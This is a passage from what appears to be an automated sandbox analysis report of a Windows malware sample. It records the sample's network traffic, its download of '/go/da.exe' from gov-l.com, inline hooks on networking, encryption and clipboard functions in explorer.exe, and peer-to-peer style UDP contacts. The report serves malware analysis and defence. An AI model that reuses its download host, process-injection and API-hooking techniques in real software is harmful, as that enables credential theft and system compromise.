Sep 23, 2013 11:35:42.602160931 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:42.672360897 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:42.673131943 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:42.673151016 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:42.685669899 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:42.686491966 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:42.686515093 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:42.687125921 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:42.689152956 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:42.689165115 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:42.689980030 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:42.755302906 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:42.756185055 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:42.756203890 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:42.756288052 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:42.756566048 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:42.766350985 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:42.809608936 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:42.810228109 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:42.810250044 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:42.810728073 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:42.882093906 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:42.882329941 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:42.882991076 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:42.883009911 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:42.883482933 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:42.907541990 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:42.907555103 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:42.908212900 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:43.036262035 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:43.036963940 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:43.037014008 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:43.037053108 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:43.037342072 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:43.037441969 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:43.037450075 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:43.038183928 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:43.214607954 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:45.682271957 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:45.682517052 CEST	1032	80	192.168.0.10	23.62.99.27
Sep 23, 2013 11:36:05.607302904 CEST	7052	1376	192.168.0.10	75.32.154.102
Sep 23, 2013 11:36:11.461339951 CEST	7052	4587	192.168.0.10	74.208.73.146
Sep 23, 2013 11:36:18.740853071 CEST	7052	8835	192.168.0.10	85.100.41.9
Sep 23, 2013 11:36:24.757910967 CEST	7052	8992	192.168.0.10	74.179.161.58
Sep 23, 2013 11:36:31.889354944 CEST	7052	6597	192.168.0.10	24.107.136.226
Sep 23, 2013 11:36:40.571105957 CEST	7052	4982	192.168.0.10	81.138.21.57
Sep 23, 2013 11:36:49.024137974 CEST	7052	4668	192.168.0.10	86.131.235.103
Sep 23, 2013 11:36:56.257484913 CEST	7052	9797	192.168.0.10	71.61.76.222
Sep 23, 2013 11:37:03.228971958 CEST	7052	4672	192.168.0.10	203.81.192.36
Sep 23, 2013 11:37:08.461266041 CEST	7052	9865	192.168.0.10	184.144.14.69
Sep 23, 2013 11:37:13.914647102 CEST	7052	5323	192.168.0.10	98.95.183.150
Sep 23, 2013 11:37:20.945631027 CEST	7052	7106	192.168.0.10	131.175.68.35
Sep 23, 2013 11:37:29.948623896 CEST	7052	2727	192.168.0.10	98.81.0.25
Sep 23, 2013 11:37:35.678349018 CEST	7052	2702	192.168.0.10	115.70.128.151

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 23, 2013 11:35:21.052078962 CEST	60401	53	192.168.0.10	195.186.1.121
Sep 23, 2013 11:35:21.647824049 CEST	53	60401	195.186.1.121	192.168.0.10
Sep 23, 2013 11:35:26.182960987 CEST	50627	53	192.168.0.10	195.186.1.121
Sep 23, 2013 11:35:26.876286983 CEST	53	50627	195.186.1.121	192.168.0.10
Sep 23, 2013 11:35:31.189676046 CEST	58910	53	192.168.0.10	195.186.1.121
Sep 23, 2013 11:35:31.811028004 CEST	53	58910	195.186.1.121	192.168.0.10
Sep 23, 2013 11:35:32.906227112 CEST	52485	53	192.168.0.10	195.186.1.121
Sep 23, 2013 11:35:33.612063885 CEST	53	52485	195.186.1.121	192.168.0.10
Sep 23, 2013 11:36:05.607302904 CEST	7052	1376	192.168.0.10	75.32.154.102
Sep 23, 2013 11:36:11.461339951 CEST	7052	4587	192.168.0.10	74.208.73.146
Sep 23, 2013 11:36:18.740853071 CEST	7052	8835	192.168.0.10	85.100.41.9
Sep 23, 2013 11:36:24.757910967 CEST	7052	8992	192.168.0.10	74.179.161.58
Sep 23, 2013 11:36:31.889354944 CEST	7052	6597	192.168.0.10	24.107.136.226
Sep 23, 2013 11:36:40.571105957 CEST	7052	4982	192.168.0.10	81.138.21.57
Sep 23, 2013 11:36:49.024137974 CEST	7052	4668	192.168.0.10	86.131.235.103
Sep 23, 2013 11:36:56.257484913 CEST	7052	9797	192.168.0.10	71.61.76.222
Sep 23, 2013 11:37:03.228971958 CEST	7052	4672	192.168.0.10	203.81.192.36
Sep 23, 2013 11:37:08.461266041 CEST	7052	9865	192.168.0.10	184.144.14.69
Sep 23, 2013 11:37:13.914647102 CEST	7052	5323	192.168.0.10	98.95.183.150
Sep 23, 2013 11:37:20.945631027 CEST	7052	7106	192.168.0.10	131.175.68.35
Sep 23, 2013 11:37:29.948623896 CEST	7052	2727	192.168.0.10	98.81.0.25
Sep 23, 2013 11:37:35.678349018 CEST	7052	2702	192.168.0.10	115.70.128.151

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Sep 23, 2013 11:35:21.052078962 CEST	192.168.0.10	195.186.1.121	0x9388	Standard query (0)	gov-l.com	A (IP address)	IN (0x0001)
Sep 23, 2013 11:35:31.189676046 CEST	192.168.0.10	195.186.1.121	0xfc3a	Standard query (0)	crl.usertrust.com	A (IP address)	IN (0x0001)
Sep 23, 2013 11:35:32.906227112 CEST	192.168.0.10	195.186.1.121	0x9b0	Standard query (0)	crl.comodoca.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Replay Code	Name	Address	Type	Class
Sep 23, 2013 11:35:21.647824049 CEST	195.186.1.121	192.168.0.10	0x9388	No error (0)	gov-l.com	74.221.210.125	A (IP address)	IN (0x0001)
Sep 23, 2013 11:35:31.811028004 CEST	195.186.1.121	192.168.0.10	0xfc3a	No error (0)	crl.usertrust.com	178.255.83.2	A (IP address)	IN (0x0001)
Sep 23, 2013 11:35:33.612063885 CEST	195.186.1.121	192.168.0.10	0x9b0	No error (0)	crl.comodoca.com	178.255.83.2	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

crl.usertrust.com

crl.comodoca.com

HTTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Header	Total Bytes Transfered (KB)
Sep 23, 2013 11:35:31.820439100 CEST	1033	80	192.168.0.10	178.255.83.2	GET /AddTrustExternalCARoot.crl HTTP/1.1 Accept: / User-Agent: Microsoft-CryptoAPI/5.131.2600.5512 Host: crl.usertrust.com Connection: Keep-Alive Cache-Control: no-cache Pragma: no-cache	61
Sep 23, 2013 11:35:32.782247066 CEST	80	1033	178.255.83.2	192.168.0.10	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Sep 2013 09:35:31 GMT Content-Type: application/x-pkcs7-crl Content-Length: 494 Last-Modified: Sun, 22 Sep 2013 11:36:52 GMT Connection: close X-CCACDN-Mirror-ID: h6edcacrl3 Accept-Ranges: bytes	62
Sep 23, 2013 11:35:33.624850988 CEST	1034	80	192.168.0.10	178.255.83.2	GET /PositiveSSLCA2.crl HTTP/1.1 Accept: / User-Agent: Microsoft-CryptoAPI/5.131.2600.5512 Host: crl.comodoca.com Connection: Keep-Alive Cache-Control: no-cache Pragma: no-cache	63
Sep 23, 2013 11:35:34.788559914 CEST	80	1034	178.255.83.2	192.168.0.10	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Sep 2013 09:35:33 GMT Content-Type: application/x-pkcs7-crl Content-Length: 310978 Last-Modified: Sun, 22 Sep 2013 14:17:14 GMT Connection: close X-CCACDN-Mirror-ID: h6edcacrl3 Accept-Ranges: bytes	64

Code Manipulation Behavior

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
GetClipboardData	INLINE	explorer.exe, wscntfy.exe, ctfmon.exe
TranslateMessage	INLINE	explorer.exe, wscntfy.exe, ctfmon.exe
ZwCreateThread	INLINE	explorer.exe, wscntfy.exe, ctfmon.exe
LdrLoadDll	INLINE	explorer.exe, wscntfy.exe, ctfmon.exe
NtCreateThread	INLINE	explorer.exe, wscntfy.exe, ctfmon.exe
closesocket	INLINE	explorer.exe
FreeAddrInfoW	INLINE	explorer.exe
WSARecv	INLINE	explorer.exe
WSAGetOverlappedResult	INLINE	explorer.exe
GetAddrInfoW	INLINE	explorer.exe
send	INLINE	explorer.exe
gethostbyname	INLINE	explorer.exe
freeaddrinfo	INLINE	explorer.exe
recv	INLINE	explorer.exe
getaddrinfo	INLINE	explorer.exe
WSASend	INLINE	explorer.exe
PFXImportCertStore	INLINE	explorer.exe
UnsealMessage	INLINE	explorer.exe, wscntfy.exe, ctfmon.exe
DeleteSecurityContext	INLINE	explorer.exe, wscntfy.exe, ctfmon.exe
DecryptMessage	INLINE	explorer.exe, wscntfy.exe, ctfmon.exe
EncryptMessage	INLINE	explorer.exe, wscntfy.exe, ctfmon.exe
SealMessage	INLINE	explorer.exe, wscntfy.exe, ctfmon.exe
InternetReadFile	INLINE	explorer.exe
HttpSendRequestA	INLINE	explorer.exe
HttpSendRequestW	INLINE	explorer.exe
InternetQueryDataAvailable	INLINE	explorer.exe
InternetReadFileExA	INLINE	explorer.exe
HttpQueryInfoW	INLINE	explorer.exe
HttpSendRequestExA	INLINE	explorer.exe
HttpQueryInfoA	INLINE	explorer.exe
InternetWriteFile	INLINE	explorer.exe
HttpSendRequestExW	INLINE	explorer.exe
InternetReadFileExW	INLINE	explorer.exe
InternetCloseHandle	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: USER32.dll

Function Name	Hook Type	New Data
GetClipboardData	INLINE	0xE9 0x9C 0xC7 0x7F 0xF3 0x33
TranslateMessage	INLINE	0xE9 0x92 0x27 0x77 0x75 0x53

Process: explorer.exe, Module: ntdll.dll

Function Name	Hook Type	New Data
ZwCreateThread	INLINE	0xE9 0x95 0x51 0x10 0x07 0x7F
LdrLoadDll	INLINE	0xE9 0x99 0x92 0x27 0x78 0x8F
NtCreateThread	INLINE	0xE9 0x95 0x51 0x10 0x07 0x7F

Process: explorer.exe, Module: WS2_32.dll

Function Name	Hook Type	New Data
closesocket	INLINE	0xE9 0x97 0x7C 0xC0 0x06 0x6D
FreeAddrInfoW	INLINE	0xE9 0x9A 0xA9 0x91 0x18 0x8D
WSARecv	INLINE	0xE9 0x9A 0xA1 0x1F 0xF8 0x8D
WSAGetOverlappedResult	INLINE	0xE9 0x97 0x78 0x83 0x3A 0xAD
GetAddrInfoW	INLINE	0xE9 0x9A 0xA4 0x41 0x19 0x9D
send	INLINE	0xE9 0x96 0x6E 0xEF 0xFA 0xAD
gethostbyname	INLINE	0xE9 0x9E 0xE5 0x5F 0xF0 0x0D
freeaddrinfo	INLINE	0xE9 0x9A 0xA9 0x91 0x18 0x8D
recv	INLINE	0xE9 0x98 0x8F 0xFD 0xDD 0xDD
getaddrinfo	INLINE	0xE9 0x9C 0xCD 0xD1 0x18 0x8D
WSASend	INLINE	0xE9 0x9E 0xED 0xDD 0xDD 0xDD

Process: explorer.exe, Module: CRYPT32.dll

Function Name	Hook Type	New Data
PFXImportCertStore	INLINE	0xE9 0x91 0x1D 0xDE 0xE6 0x6D

Process: explorer.exe, Module: Secur32.dll

Function Name	Hook Type	New Data
UnsealMessage	INLINE	0xE9 0x90 0x07 0x79 0x9E 0xE8
DeleteSecurityContext	INLINE	0xE9 0x92 0x2F 0xF1 0x17 0x78
DecryptMessage	INLINE	0xE9 0x90 0x07 0x79 0x9E 0xE8
EncryptMessage	INLINE	0xE9 0x91 0x12 0x29 0x9E 0xE8
SealMessage	INLINE	0xE9 0x91 0x12 0x29 0x9E 0xE8

Process: explorer.exe, Module: WININET.dll

Function Name	Hook Type	New Data
InternetReadFile	INLINE	0xE9 0x90 0x0C 0xC6 0x6C 0xCE
HttpSendRequestA	INLINE	0xE9 0x93 0x3E 0xED 0xDB 0xBE
HttpSendRequestW	INLINE	0xE9 0x92 0x2C 0xCC 0xCF 0xFE
InternetQueryDataAvailable	INLINE	0xE9 0x94 0x46 0x61 0x12 0x2E
InternetReadFileExA	INLINE	0xE9 0x9F 0xFC 0xC9 0x9D 0xDE
HttpQueryInfoW	INLINE	0xE9 0x9F 0xF0 0x01 0x14 0x4E
HttpSendRequestExA	INLINE	0xE9 0x9A 0xA7 0x72 0x23 0x3E
HttpQueryInfoA	INLINE	0xE9 0x9D 0xD7 0x74 0x4A 0xAE
InternetWriteFile	INLINE	0xE9 0x92 0x25 0x56 0x6B 0xBE
HttpSendRequestExW	INLINE	0xE9 0x97 0x71 0x12 0x23 0x3E
InternetReadFileExW	INLINE	0xE9 0x95 0x5A 0xA9 0x9E 0xEE
InternetCloseHandle	INLINE	0xE9 0x97 0x78 0x82 0x2E 0xEE

Process: wscntfy.exe, Module: Secur32.dll

Function Name	Hook Type	New Data
UnsealMessage	INLINE	0xE9 0x90 0x07 0x79 0x9E 0xEB
DeleteSecurityContext	INLINE	0xE9 0x92 0x2F 0xF1 0x17 0x7B
DecryptMessage	INLINE	0xE9 0x90 0x07 0x79 0x9E 0xEB
EncryptMessage	INLINE	0xE9 0x91 0x12 0x29 0x9E 0xEB
SealMessage	INLINE	0xE9 0x91 0x12 0x29 0x9E 0xEB

Process: wscntfy.exe, Module: USER32.dll

Function Name	Hook Type	New Data
GetClipboardData	INLINE	0xE9 0x9C 0xC7 0x7F 0xF3 0x36
TranslateMessage	INLINE	0xE9 0x92 0x27 0x77 0x75 0x56

Process: wscntfy.exe, Module: ntdll.dll

Function Name	Hook Type	New Data
ZwCreateThread	INLINE	0xE9 0x95 0x51 0x10 0x07 0x71
LdrLoadDll	INLINE	0xE9 0x99 0x92 0x27 0x78 0x81
NtCreateThread	INLINE	0xE9 0x95 0x51 0x10 0x07 0x71

Process: ctfmon.exe, Module: USER32.dll

Function Name	Hook Type	New Data
GetClipboardData	INLINE	0xE9 0x9C 0xC7 0x7F 0xF3 0x38
TranslateMessage	INLINE	0xE9 0x92 0x27 0x77 0x75 0x58

Process: ctfmon.exe, Module: Secur32.dll

Function Name	Hook Type	New Data
UnsealMessage	INLINE	0xE9 0x90 0x07 0x79 0x9E 0xED
DeleteSecurityContext	INLINE	0xE9 0x92 0x2F 0xF1 0x17 0x7D
DecryptMessage	INLINE	0xE9 0x90 0x07 0x79 0x9E 0xED
EncryptMessage	INLINE	0xE9 0x91 0x12 0x29 0x9E 0xED
SealMessage	INLINE	0xE9 0x91 0x12 0x29 0x9E 0xED

Process: ctfmon.exe, Module: ntdll.dll

Function Name	Hook Type	New Data
ZwCreateThread	INLINE	0xE9 0x95 0x51 0x10 0x07 0x73
LdrLoadDll	INLINE	0xE9 0x99 0x92 0x27 0x78 0x83
NtCreateThread	INLINE	0xE9 0x95 0x51 0x10 0x07 0x73

System Behavior

Analysis Process: 9f68ae8267182bf1be4e5bb6c75022b8.exe PID: 1476 Parent PID: 1120

General

Start time:	11:34:57
Start date:	23/09/2013
Path:	C:\9f68ae8267182bf1be4e5bb6c75022b8.exe
Wow64 process (32bit):	false
Commandline:	unknown
Imagebase:	0x3500000
File size:	20992 bytes
MD5 hash:	9F68AE8267182BF1BE4E5BB6C75022B8

Chronological Activities

Analysis Process: dfengh.exe PID: 1700 Parent PID: 1476

General

Start time:	11:34:58
Start date:	23/09/2013
Path:	C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\dfengh.exe
Wow64 process (32bit):	false
Commandline:	C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\dfengh.exe
Imagebase:	0x3500000
File size:	21074 bytes
MD5 hash:	31A061B9C2661D02C88C04887651AA53

Chronological Activities

Analysis Process: bfsrfgs.exe PID: 1632 Parent PID: 1700

General

Start time:	11:35:23
Start date:	23/09/2013
Path:	C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\bfsrfgs.exe
Wow64 process (32bit):	false
Commandline:	C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\bfsrfgs.exe
Imagebase:	0x3500000
File size:	365568 bytes
MD5 hash:	CE82CCE381074ABA34C76B7929CBCC29

Chronological Activities

Analysis Process: yxufa.exe PID: 908 Parent PID: 1632

General

Start time:	11:35:25
Start date:	23/09/2013
Path:	C:\Documents and Settings\Administrator\Application Data\Uvar\yxufa.exe
Wow64 process (32bit):	false
Commandline:	C:\Documents and Settings\Administrator\Application Data\Uvar\yxufa.exe
Imagebase:	0x3500000
File size:	365568 bytes
MD5 hash:	80E258A5B4707BDC9674627FAADD86A4

Chronological Activities

Analysis Process: explorer.exe PID: 1548 Parent PID: 908

General

Start time:	11:35:25
Start date:	23/09/2013
Path:	C:\WINDOWS\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\WINDOWS\Explorer.EXE
Imagebase:	0x1000000
File size:	1033728 bytes
MD5 hash:	12896823FB95BFB3DC9B46BCAEDC9923

Chronological Activities

Analysis Process: ctfmon.exe PID: 1732 Parent PID: 908

General

Start time:	11:35:30
Start date:	23/09/2013
Path:	C:\WINDOWS\system32\ctfmon.exe
Wow64 process (32bit):	false
Commandline:	C:\WINDOWS\system32\ctfmon.exe
Imagebase:	0x400000
File size:	15360 bytes
MD5 hash:	5F1D5F88303D4A4DBC8E5F97BA967CC3

Chronological Activities

Analysis Process: wscntfy.exe PID: 1640 Parent PID: 908

General

Start time:	11:35:32
Start date:	23/09/2013
Path:	C:\WINDOWS\system32\wscntfy.exe
Wow64 process (32bit):	false
Commandline:	C:\WINDOWS\system32\wscntfy.exe
Imagebase:	0x1000000
File size:	13824 bytes
MD5 hash:	F92E1076C42FCD6DB3D72D8CFE9816D5

Chronological Activities

Analysis Process: cmd.exe PID: 116 Parent PID: 1632

General

Start time:	11:35:35
Start date:	23/09/2013
Path:	C:\WINDOWS\system32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\WINDOWS\system32\cmd.exe /c C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\SMNBD85.bat
Imagebase:	0x4ad00000
File size:	389120 bytes
MD5 hash:	6D778E0F95447E6546553EEEA709D03C

Chronological Activities

Disassembly

Code Analysis

< >

Analysis Process: 9f68ae8267182bf1be4e5bb6c75022b8.exe PID: 1476 Parent PID: 1120

Executed Functions

Function 00871019, Relevance: 86.1, APIs: 39, Strings: 10, Instructions: 310

APIs

ExitProcess.KERNEL32(00000001,?,00000008,?,?,?,?,?,80000000,00000001,?,00000003,00000080), ref: 00871020
HeapCreate.KERNEL32(?,00002000), ref: 0087102E
HeapAlloc.KERNEL32(?,00000008,00002000,?,00002000), ref: 00871041
HeapAlloc.KERNEL32(?,00000008,00002000,?,00000008,00002000,?,00002000), ref: 0087104C
GetModuleFileNameW.KERNEL32(?,?,00002000,?,00000008,00002000,?,00000008,00002000,?,00002000), ref: 00871056
GetTempPathW.KERNEL32(00001000), ref: 00871064
wsprintfW.USER32 ref: 0087107A
CreateFileW.KERNEL32(?,80000000,00000001,?,00000003,00000080), ref: 00871096
GetFileSize.KERNEL32 ref: 008710AE
lstrlenW.KERNEL32 ref: 008710C0
HeapAlloc.KERNEL32(?,00000008,?,?,?,?,?,80000000,00000001,?,00000003,00000080), ref: 008710CF
ReadFile.KERNEL32 ref: 008710E8
lstrcmpW.KERNEL32 ref: 008710F4
lstrlenW.KERNEL32 ref: 00871105
CreateFileW.KERNEL32(?,40000000,00000002,?,00000002,00000080), ref: 0087113D
lstrlenW.KERNEL32 ref: 00871157
WriteFile.KERNEL32 ref: 00871164
CloseHandle.KERNEL32 ref: 00871173
CloseHandle.KERNEL32 ref: 00871178
GetTempPathW.KERNEL32(00001000), ref: 00871182
ShellExecuteW.SHELL32(?,open), ref: 00871196
CloseHandle.KERNEL32 ref: 008711C4
DeleteFileW.KERNEL32 ref: 008711DC
InternetOpenW.WININET(Updates downloader), ref: 008711EF
InternetConnectW.WININET(?,gov-l.com,000001BB,?,?,00000003), ref: 0087122B
HttpOpenRequestW.WININET(?,?,/go/da.exe,?,?,?,80803000), ref: 00871260
HttpOpenRequestW.WININET(?,?,/go/da.exe,?,?,?,80803000), ref: 0087127E
Sleep.KERNEL32(000003E8), ref: 00871288
InternetQueryOptionW.WININET(?,0000001F), ref: 008712A6
InternetSetOptionW.WININET(?,0000001F,?,00000004), ref: 008712BD
HttpSendRequestW.WININET ref: 008712CA
HttpQueryInfoW.WININET(?,20000005), ref: 008712EB
HeapAlloc.KERNEL32(?,00000008,?,?,20000005,?,?,?,?,?,?,?,?,?,0000001F), ref: 008712F9
InternetReadFile.WININET ref: 00871316
CreateFileW.KERNEL32(bfsrfgs.exe,40000000,00000002,?,00000002,00000080), ref: 00871347
WriteFile.KERNEL32 ref: 0087135B
CloseHandle.KERNEL32 ref: 00871362
GetCurrentDirectoryW.KERNEL32(00001000), ref: 00871374
wsprintfW.USER32 ref: 00871388

Strings

dfengh.exe, xrefs: 0087106A
%s%s, xrefs: 00871072
open, xrefs: 00871190
Updates downloader, xrefs: 008711EA
gov-l.com, xrefs: 00871211 00871223
/go/da.exe, xrefs: 00871246 00871275
text/*, xrefs: 0087124F
application/*, xrefs: 00871256
bfsrfgs.exe, xrefs: 00871341 00871346 0087137A
%s\%s, xrefs: 00871382

Memory Dump Source

Source File: 00000000.00000002.694118703.00870000.00000040.sdmp, Offset: 00870000, based on PE: true

Function 03501575, Relevance: 42.8, APIs: 9, Strings: 15, Instructions: 753

APIs

GetCursorInfo.USER32(?), ref: 0350158A
CreateDirectoryW.KERNEL32(03503545,00000000), ref: 035015A6
ExitProcess.KERNEL32(00000001), ref: 035015B9
#14.CABINET(?), ref: 035015C6
GetModuleHandleW.KERNEL32(00000000), ref: 035016AB
VirtualAlloc.KERNEL32 ref: 035017CD
VirtualAlloc.KERNEL32 ref: 03501AF1
VirtualAlloc.KERNEL32(?,?,00003000,00000040), ref: 03501C57
LoadLibraryA.KERNEL32(?), ref: 03501E9C

Strings

GetProcAddress, xrefs: 0350160F
LoadLibraryA, xrefs: 03501630
VirtualAlloc, xrefs: 0350164C
RtlDecompressBuffer, xrefs: 03501665
VirtualProtect, xrefs: 0350167E
F, xrefs: 035017FF
F, xrefs: 03501823
F, xrefs: 0350188B
F, xrefs: 03501916
F, xrefs: 0350193A
F, xrefs: 035019B2
<, xrefs: 03501A20
2, xrefs: 03501A5B
2, xrefs: 03501AD6
GetSystemTime, xrefs: 03501B7F

Memory Dump Source

Source File: 00000000.00000001.688636422.03501000.00000020.sdmp, Offset: 03500000, based on PE: true

Associated: 00000000.00000001.688609169.03500000.00000002.sdmp
Associated: 00000000.00000001.688658857.03503000.00000002.sdmp
Associated: 00000000.00000001.688679348.03504000.00000008.sdmp
Associated: 00000000.00000001.688704398.03505000.00000002.sdmp

Non-executed Functions

Analysis Process: dfengh.exe PID: 1700 Parent PID: 1476

Executed Functions

Non-executed Functions

Analysis Process: bfsrfgs.exe PID: 1632 Parent PID: 1700

Executed Functions

Function 00FF358E, Relevance: 14.3, APIs: 6, Strings: 1, Instructions: 64

APIs

InitializeSecurityDescriptor.ADVAPI32(01002980,00000001), ref: 00FF359E
SetSecurityDescriptorDacl.ADVAPI32(01002980,00000001,00000000,00000000), ref: 00FF35AF
ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 00FF35C5
GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 00FF35E1
SetSecurityDescriptorSacl.ADVAPI32(01002980,?,00000001,?), ref: 00FF35F5
LocalFree.KERNEL32(?), ref: 00FF3607

Strings

S:(ML;;NRNWNX;;;LW), xrefs: 00FF35C0

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00FDD904, Relevance: 3.1, APIs: 2, Instructions: 79

APIs

Part of subcall function 00FD5A4F: GetLastError.KERNEL32(?,?,00FCB9B4), ref: 00FD5A51
Part of subcall function 00FD5A4F: TlsGetValue.KERNEL32(?,?,00FCB9B4), ref: 00FD5A6E
Part of subcall function 00FD5A4F: TlsSetValue.KERNEL32(00000001), ref: 00FD5A80
Part of subcall function 00FD5A4F: SetLastError.KERNEL32(?,?,00FCB9B4), ref: 00FD5A90

NtQueryInformationProcess.NTDLL(?,00000000,?,00000018), ref: 00FDD93C

Part of subcall function 00FEBE5A: CreateMutexW.KERNEL32(01002974,00000001,?), ref: 00FEBEA0
Part of subcall function 00FEBE5A: GetLastError.KERNEL32(?,?,?,00000002,00000000), ref: 00FEBEAC
Part of subcall function 00FEBE5A: CloseHandle.KERNEL32 ref: 00FEBEBA

Part of subcall function 00FCFBD5: TlsGetValue.KERNEL32(?,?,00FDD975), ref: 00FCFBDE

Part of subcall function 00FE4A6B: DuplicateHandle.KERNEL32(000000FF,?,?,?,00000000,00000000,00000002), ref: 00FE4A89
Part of subcall function 00FE4A6B: DuplicateHandle.KERNEL32(000000FF,?,?,?,00000000,00000000,00000002), ref: 00FE4AC4
Part of subcall function 00FE4A6B: WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00FE4B04
Part of subcall function 00FE4A6B: WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00FE4B27
Part of subcall function 00FE4A6B: VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 00FE4B77

CloseHandle.KERNEL32 ref: 00FDD9B1

Part of subcall function 00FD506A: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 00FD507A
Part of subcall function 00FD506A: Thread32First.KERNEL32(?,?), ref: 00FD5095
Part of subcall function 00FD506A: Thread32Next.KERNEL32(?,?), ref: 00FD50A8
Part of subcall function 00FD506A: CloseHandle.KERNEL32 ref: 00FD50B3

Part of subcall function 00FD5AD5: GetLastError.KERNEL32(?,00FCBA1E), ref: 00FD5AD6
Part of subcall function 00FD5AD5: TlsSetValue.KERNEL32(00000000), ref: 00FD5AE6
Part of subcall function 00FD5AD5: SetLastError.KERNEL32(?,?,00FCBA1E), ref: 00FD5AED

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 0351C52C, Relevance: 48.0, APIs: 11, Strings: 16, Instructions: 776

APIs

GetColorDirectoryW.MSCMS(00000000,?,?), ref: 0351C550
GetLastError.KERNEL32 ref: 0351C593
ExitProcess.KERNEL32(00000004), ref: 0351C5D5
CreateDirectoryW.KERNEL32(0353D6D0,00000000), ref: 0351C5E4
ExitProcess.KERNEL32(00000001), ref: 0351C5F7
#14.CABINET(?), ref: 0351C604
GetModuleHandleW.KERNEL32(00000000), ref: 0351C6F5
VirtualAlloc.KERNEL32 ref: 0351C829
VirtualAlloc.KERNEL32 ref: 0351CC19
VirtualAlloc.KERNEL32(?,?,00003000,00000040), ref: 0351CDA0
LoadLibraryA.KERNEL32(?), ref: 0351CFE5

Strings

z, xrefs: 0351C561
GetProcAddress, xrefs: 0351C656
LoadLibraryA, xrefs: 0351C677
VirtualAlloc, xrefs: 0351C693
RtlDecompressBuffer, xrefs: 0351C6AC
VirtualProtect, xrefs: 0351C6C8
F, xrefs: 0351C85E
F, xrefs: 0351C88E
F, xrefs: 0351C90B
F, xrefs: 0351C9C0
F, xrefs: 0351C9F0
F, xrefs: 0351CA80
<, xrefs: 0351CB1B
2, xrefs: 0351CB65
2, xrefs: 0351CBF8
GetSystemTime, xrefs: 0351CCAD

Memory Dump Source

Source File: 00000002.00000002.828112965.03501000.00000020.sdmp, Offset: 03500000, based on PE: true

Associated: 00000002.00000002.828095997.03500000.00000002.sdmp
Associated: 00000002.00000002.828175402.03522000.00000002.sdmp
Associated: 00000002.00000002.828231158.03540000.00000008.sdmp
Associated: 00000002.00000002.828283216.03559000.00000004.sdmp
Associated: 00000002.00000002.828301623.0355C000.00000002.sdmp

Function 00C35482, Relevance: 22.5, APIs: 6, Strings: 5, Instructions: 109

